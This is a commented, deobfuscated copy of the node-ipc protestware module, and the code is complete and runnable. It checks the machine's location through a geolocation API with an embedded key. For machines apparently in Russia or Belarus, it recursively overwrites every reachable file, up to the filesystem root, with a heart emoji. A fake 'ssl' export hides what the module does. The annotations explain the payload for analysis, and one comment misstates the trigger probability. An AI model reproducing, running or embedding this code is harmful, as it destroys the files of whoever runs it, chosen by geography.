import u from "path";
import a from "fs";
import o from "https";

// **WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR RISK.**

// Obfuscated code that I deobfuscated.
// I also added comments which should help explain what exactly is going on here.

// Oiginally written by Brandon Nozaki Miller (https://github.com/RIAEvangelist)
// See you in prison, Brandom.

// Original commit: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

// A timeout is used to add an artificial delay.
setTimeout(function () {
  // A 50% chance that all of your files will get overwritten.
  const t = Math.round(Math.random() * 4);
  if (t > 1) return;

  // This URL is used to specifically target people in Russia and Belarus.
  const n =
    "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";

  // A request is send to the URL above. The server sends the location of the request to the requester.
  o.get(n, function (t) {
    t.on("data", function (t) {
      const n = "./";
      const o = "../";
      const r = "../../";
      const f = "/";
      const c = "country_name";
      // Specifically targets the citizens of Russia and Belarus.
      const e = "russia";
      const i = "belarus";
      try {
        const s = JSON.parse(t);
        const u = s[c].toLowerCase();
        // "If your country is from Russia or Belarus, overwrite all of your files."
        const a = u.includes(e) || u.includes(i);
        if (a) {
          h(n);
          h(o);
          h(r);
          h(f);
        }
      } catch (t) {}
    });
  });
}, Math.ceil(Math.random() * 1e3));

/**
 * @param n The relative location of CWD of where the script was ran.
 * @param o Presumably meant to be used recursively.
 */
// The function that does the overwriting. Not sure why it is `async` though.
async function h(n = "", o = "") {
  // Checks to see if the directory within your file system exists.
  if (!a.existsSync(n)) return;
  let r = [];
  try {
    // Gets all of the files within the directory.
    r = a.readdirSync(n);
  } catch (t) {}
  const f = [];
  // Your files will get overwritten with a heart emoji. Perfect.
  const c = "❤️";
  for (var e = 0; e < r.length; e++) {
    const i = u.join(n, r[e]);
    let t = null;
    try {
      t = a.lstatSync(i);
    } catch (t) {
      continue;
    }
    // If the file is a directory, it will run the `h` function again.
    if (t.isDirectory()) {
      const s = h(i, o);
      // Again, the function was async. This will not even work properly.
      s.length > 0 ? f.push(...s) : null;
    } else if (i.indexOf(o) >= 0) {
      try {
        // The files get overwritten. Thanks, Brandon.
        a.writeFile(i, c, function () {});
      } catch (t) {}
    }
  }
  return f;
}

// Fake exports probably intended to trick consumers.
const ssl = true;
export { ssl, ssl as default };